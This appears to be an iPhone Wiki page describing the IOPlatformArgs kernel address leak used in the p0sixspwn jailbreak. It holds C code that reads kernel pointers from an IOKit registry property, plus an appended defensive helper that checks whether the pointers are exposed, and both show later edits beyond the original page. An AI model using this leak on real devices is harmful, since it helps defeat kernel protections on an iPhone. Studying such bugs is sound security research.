IOPlatformArgs leak

From The iPhone Wiki
Revision as of 13:39, 4 July 2014 by I3ppwn (talk | contribs)

This vulnerability was used in p0sixspwn. It leaks the kernel base address. This is the code:

#include <stdint.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>

/* Layout of the 16-byte IOPlatformArgs property: two kernel pointers followed by two zero words. */
typedef struct {
    uint32_t deviceTreeP;
    uint32_t bootArgs;
    uint32_t zero;
    uint32_t zero_1;
} platformArgs;

static uint32_t
get_kernel_base_boot_args(void)
{
    CFStringRef parameter = CFSTR("IOPlatformArgs");
    CFTypeRef prop = NULL;
    platformArgs IOPlatformArgs = { 0 };

    /* The platform expert's IOPlatformArgs property is readable from user space. */
    io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                              IOServiceMatching("IOPlatformExpertDevice"));
    if (platformExpert) {
        prop = IORegistryEntryCreateCFProperty(platformExpert, parameter, kCFAllocatorDefault, 0);
        IOObjectRelease(platformExpert);
    }
    /* The original read `data` uninitialized when the service was missing; fail cleanly instead. */
    if (prop == NULL || CFGetTypeID(prop) != CFDataGetTypeID()) {
        if (prop) CFRelease(prop);
        return 0;
    }
    CFDataRef data = (CFDataRef)prop;
    CFIndex bufferLength = CFDataGetLength(data);
    if (bufferLength >= (CFIndex)sizeof(IOPlatformArgs)) {
        /* Copy the raw property bytes straight into the struct (the original malloc'd a buffer and bcopy'd it). */
        CFDataGetBytes(data, CFRangeMake(0, sizeof(IOPlatformArgs)), (UInt8 *)&IOPlatformArgs);
    }
    CFRelease(data);
    return IOPlatformArgs.bootArgs;
}

Once the attacker knows the virtual base, the virt_to_phys macro gives the physical base as well, so both bases are leaked. All of this relies on the IOPlatformArgs bug.
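As an added example (not code from the wiki page or from p0sixspwn), a small audit helper that decodes the 16-byte IOPlatformArgs blob laid out above and counts how many of its fields fall in the kernel virtual address range, which is the check a defender would run to confirm whether a device's property still exposes kernel pointers. The 0x80000000 boundary for 32-bit ARM iOS kernels is an assumption, and the sample byte strings are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Layout of the IOPlatformArgs property as this page describes it. */
typedef struct {
    uint32_t deviceTreeP;
    uint32_t bootArgs;
    uint32_t zero;
    uint32_t zero_1;
} platformArgs;

#define IOPLATFORMARGS_LEN 16
/* Assumption: 32-bit ARM iOS kernel virtual addresses start at 0x80000000. */
#define KERNEL_VA_MIN 0x80000000u

/* Constructed sample: a property exposing two kernel pointers (little-endian words). */
static const uint8_t SAMPLE_LEAKY[IOPLATFORMARGS_LEN] = {
    0x00, 0xc0, 0xb1, 0x80,   /* deviceTreeP = 0x80b1c000 */
    0x00, 0x00, 0xb2, 0x80,   /* bootArgs    = 0x80b20000 */
    0, 0, 0, 0, 0, 0, 0, 0 };
/* Constructed sample: the same property with the pointers zeroed. */
static const uint8_t SAMPLE_SANITIZED[IOPLATFORMARGS_LEN] = { 0 };

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode the raw property bytes. Rejects a missing or short buffer, the case the
   page's snippet mishandles by reading an uninitialized CFDataRef. */
static bool parse_platform_args(const uint8_t *buf, size_t len, platformArgs *out)
{
    if (buf == NULL || out == NULL || len < IOPLATFORMARGS_LEN) return false;
    out->deviceTreeP = rd32le(buf);
    out->bootArgs    = rd32le(buf + 4);
    out->zero        = rd32le(buf + 8);
    out->zero_1      = rd32le(buf + 12);
    return true;
}

/* Audit check: how many fields look like kernel virtual addresses (0 = nothing leaked). */
static int count_kernel_pointers(const platformArgs *pa)
{
    const uint32_t f[4] = { pa->deviceTreeP, pa->bootArgs, pa->zero, pa->zero_1 };
    int n = 0;
    for (int i = 0; i < 4; i++) if (f[i] >= KERNEL_VA_MIN) n++;
    return n;
}
```

On a real device the bytes would come from CFDataGetBytes on the property, as in the snippet above; a result of 0 means the pointers have been sanitized.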